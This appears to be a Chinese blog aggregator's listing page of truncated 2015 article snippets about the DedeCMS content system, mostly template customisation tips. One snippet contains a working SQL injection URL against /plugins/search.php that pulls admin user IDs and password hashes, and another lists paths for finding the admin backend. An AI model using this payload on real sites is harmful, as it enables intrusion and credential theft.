dedecms /plus/feedback.php SQL Injection Vul
分类:
数据库 时间:
2015-05-16 14:45:52
阅读次数:
448
DEDECMSV5.7版本出现后,在前台网页底部会出现织梦版权信息 “powered by dedecms”,很多人都不知道怎么去掉1.方法一:在include/dedesql.classs.php文件中找到第588行方法二:大家可以在系统参数里自己添加一个变量,然后在模板调用这个变量。 不用默认....
分类:
其他好文 时间:
2015-05-15 19:36:19
阅读次数:
119
dedecms /install/index.php.bak Installation File Not Deleted && Executed Via Apache Analytic Vul
分类:
Web程序 时间:
2015-05-15 15:11:42
阅读次数:
191
1.修改添加/编辑专题的模板文件文件位于 dede\templets下面的 spec_edit.htm 文件,打开文件并找到 “单条记录的模板:” ,在后面添加下面的代码节点容器模板:123节点容器模板:"style="width: 300;"type="text"name="notetemplet...
分类:
其他好文 时间:
2015-05-13 19:02:21
阅读次数:
164
{dede:field.title/}_{dede:field name='typeid' runphp='yes'}$id=@me;global $dsql;$sql="select seotitle from dede_arctype where id=$id";$row=$dsql->getO...
分类:
其他好文 时间:
2015-05-13 16:11:05
阅读次数:
111
转自http://blog.sina.com.cn/s/blog_a184ee580101mhbb.htmlhttp://www.ifreew.com/a/ym/Dedecms/9192.html打开include\taglib\channelartlist.lib.php找到$pv->Fields...
分类:
其他好文 时间:
2015-05-13 16:01:51
阅读次数:
135
本文,小瀚想和大家一起来学习一下DEDECMS中目前所使用的模板技术的原理:什么是编译式模板、解释式模板,它们的区别是什么?模板标签有哪些种类,它们的区别是什么,都应用在哪些场景?学习模板的机制原理对我们修复目前CMS中常出现的模板类代码执行的漏洞能起到怎样的帮助?带着这些问题,我们进入今天的代码研...
分类:
其他好文 时间:
2015-05-13 12:26:56
阅读次数:
276
DedeCMS顽固木马后门专杀工具V2.0实现方式研究
分类:
其他好文 时间:
2015-05-13 00:36:27
阅读次数:
416
首先:注入exp有时候有些/plus/目录换成了/plugins目录/plugins/search.php?keyword=as&typeArr[111%3D@`\‘`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__adm..
分类:
其他好文 时间:
2015-05-08 00:20:49
阅读次数:
105
一、dedecms找后台1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理员帐号,新版本的就直接转向了后台.2.include/dialog/config.php会爆出后台管理路径3.include/dialog/select_soft.php?activepath=/include/FCKedit..
分类:
其他好文 时间:
2015-05-08 00:18:28
阅读次数:
567